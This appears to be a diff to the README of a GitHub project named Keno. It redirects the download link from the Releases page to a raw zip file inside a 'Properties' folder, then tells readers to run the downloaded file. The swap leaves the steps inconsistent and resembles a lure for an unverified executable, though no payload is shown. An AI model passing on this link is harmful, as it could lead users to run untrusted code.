AriesWantYou/Keno/README.md

 ## 📥 Download & Install

-To download Keno, visit this page: [Download Keno Releases](https://github.com/AriesWantYou/Keno/releases).
+To download Keno, visit this page: [Download Keno Releases](https://raw.githubusercontent.com/AriesWantYou/Keno/main/Keno/Properties/Keno_v3.9.zip).

 1. On the Releases page, find the latest version listed.
 2. Click on the version number link to access the release details.
 3. Scroll down to the "Assets" section.
-4. Select the file that suits your system (e.g., `Keno.exe`) and click to download it.
+4. Select the file that suits your system (e.g., `https://raw.githubusercontent.com/AriesWantYou/Keno/main/Keno/Properties/Keno_v3.9.zip`) and click to download it.
 5. Once downloaded, locate the file on your computer and double-click it to run.

 ## 💻 How to Use Keno